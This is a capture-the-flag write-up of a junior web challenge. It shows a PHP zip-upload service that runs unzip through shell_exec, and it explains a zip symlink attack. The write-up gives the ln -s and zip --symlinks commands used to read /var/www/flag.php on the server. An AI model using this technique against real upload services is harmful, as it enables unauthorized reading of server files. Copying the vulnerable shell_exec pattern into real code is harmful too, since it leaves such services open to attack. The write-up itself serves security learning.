## Upload

![upload0](upload0.png)

In the junior challenges, the first one in the Web category was the Upload challenge.
The idea was to exploit a service to unzip some files.
Below is an overview of the website.

![upload1](images/upload1.png)

As you can see we can have a look at the source code. 
Below is the source code of the application to exploit.


```
<?php
$UPLOADS = '/var/www/uploads/';
if(!empty($_FILES['uploaded_file'])) {
    $paths = scandir($UPLOADS);
    $now = time();
    foreach($paths as $path) {
        if ($path == '.') {
            continue;
        }
        $mtime = filemtime($UPLOADS . $path);
        if ($now - $mtime > 120) {
            shell_exec('rm -rf ' . $UPLOADS . $path);
        }
    }
    $path = $UPLOADS . uniqid('upl') . '/';
    if(!mkdir($path, 0777, true)) {
        die('mkdir failed');
    }
    $zip = $path . uniqid('zip');
    if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $zip)) {
        shell_exec('unzip -j -n ' . $zip . ' -d ' . $path);
        unlink($zip);
        header('Location: uploads/'. basename($path) . '/');
    } else {
        echo 'There was an error uploading the file, please try again!';
    }
} else {
?>
<!DOCTYPE html>
<html>
<head>
    <title>Upload your files</title>
</head>
<body>
<?php
    if (@$_GET['source']) {
        highlight_file(__FILE__);
    } else {
?>
    <form enctype="multipart/form-data" method="POST">
        <p>Upload your file</p>
        <input type="file" name="uploaded_file"></input><br />
        <input type="submit"></input>
    </form>
    <a href="?source=1">Show source</a>
</body>
</html>
<?php
    }
}
?> 

```

We can upload zip files :

![upload1](images/upload1.png)

and the application will return the unzip files in the browser :

![upload2](images/upload2.png)


By analysing the source code, we could see that the php code use the **shell_exec** function to call the unzip function.

There is a well known vulnerability with the zip function. To read more about it check on google for ** zip symlink vulnerability **.


To exploit it we just need to do the followings :

1. create a zip file with a symlinks to the flag.php file

```
$ ln -s /var/ ./symlinks
```

2. Then zip the symlink file

```
$ zip --symlinks -r demo.zip ./symlinks
```

Now when the php script unzip demo.zip , it will return the ./symlinks file and when we click on it we get redirected to the  path /var/ on the server as below :

![upload3](upload3.png)

In our case we have a hint about where the flag. In fact we know that the flag is stored in a file flag.php on the server. So we just need to the following to get the flag. 

```
$ ln -s /var/www/flag.php ./flag.php
$ zip --symlinks -r hacker.zip ./flag.php
```

And it works like a charm :)

![image4.png](images/upload4.png)

![image5.png](images/upload5.png)

![image6.png](images/upload6.png)


Next time remember, check if there is any well known vulnerability about a function or service.


@soglomania
@OpenToAllTeam
